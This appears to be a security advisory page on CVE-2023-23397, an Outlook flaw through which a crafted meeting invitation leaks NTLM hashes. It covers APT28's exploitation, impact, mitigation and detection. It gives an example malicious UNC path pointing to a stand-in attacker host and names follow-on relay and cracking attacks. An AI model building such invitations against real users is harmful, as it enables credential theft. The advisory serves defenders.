NAVANEM
CVE-2023-23397⚡ exploited in the wild

Microsoft Outlook, NTLM credential leak via PidLidReminderFileParameter (Fancy Bear)

Microsoft Outlook Elevation of Privilege Vulnerability. An attacker who successfully exploited this vulnerability could access a user's Net-NTLMv2 hash which could be used as a basis of an NTLM Relay attack against another service.

Overview

CVE-2023-23397 is a critical elevation of privilege vulnerability in Microsoft Outlook that allows attackers to steal NTLM credentials without any user interaction. The vulnerability was actively exploited in the wild by APT28 (Fancy Bear), a Russian GRU-linked threat actor, for nearly a year before public disclosure. Attacks targeted Western government, military, transportation, and energy sector organizations in Europe and the Middle East starting from at least April 2022.

Technical Details

The vulnerability exists in how Microsoft Outlook processes the PidLidReminderFileParameter MAPI property, which specifies the sound file to play when a calendar reminder triggers. Outlook automatically resolves this value as a UNC path without requiring any user interaction.

When an attacker sends a specially crafted meeting invitation with this property set to a malicious UNC path (e.g., \\attacker.com\share\file.wav), Outlook automatically attempts to connect to the attacker-controlled SMB server. During this connection attempt, Windows sends the user's Net-NTLMv2 hash as part of the authentication process, effectively leaking the credential hash to the attacker.

The attack requires no user interaction, simply receiving the malicious calendar item in Outlook is sufficient to trigger the credential leak, even before the reminder fires or the user views the item.

Impact

The leaked Net-NTLMv2 hash enables multiple attack vectors:

  • Offline password cracking: Attackers can attempt to recover plaintext passwords from captured hashes
  • NTLM relay attacks: The hash can be relayed against services accepting NTLM authentication, including Domain Controllers and Exchange servers
  • AD CS certificate theft: For privileged accounts, relay attacks against Active Directory Certificate Services can lead to complete forest compromise
  • Lateral movement: Compromised credentials enable broader network access

Microsoft Threat Intelligence confirmed this vulnerability was used by APT28/Fancy Bear as part of their operational playbook against high-value targets.

Mitigation

  1. Apply patches: Install the March 2023 Outlook security update via Microsoft 365 Apps update channels or standalone MSI installers
  2. Block outbound SMB: Restrict TCP/445 at the network perimeter to prevent credential leakage to external servers
  3. Add users to Protected Users security group: This disables NTLM authentication for member accounts
  4. Audit mailboxes: Run Microsoft's published PowerShell script against Exchange to identify calendar items containing the malicious property

Detection

  • Review Exchange mailboxes for calendar items with populated PidLidReminderFileParameter properties containing UNC paths
  • Monitor for unusual outbound SMB connections (TCP/445) to external IP addresses
  • Audit for suspicious Kerberos golden ticket activity
  • Review AD CS certificate issuances for anomalies
  • For environments that historically allowed outbound SMB, assume credential compromise and investigate accordingly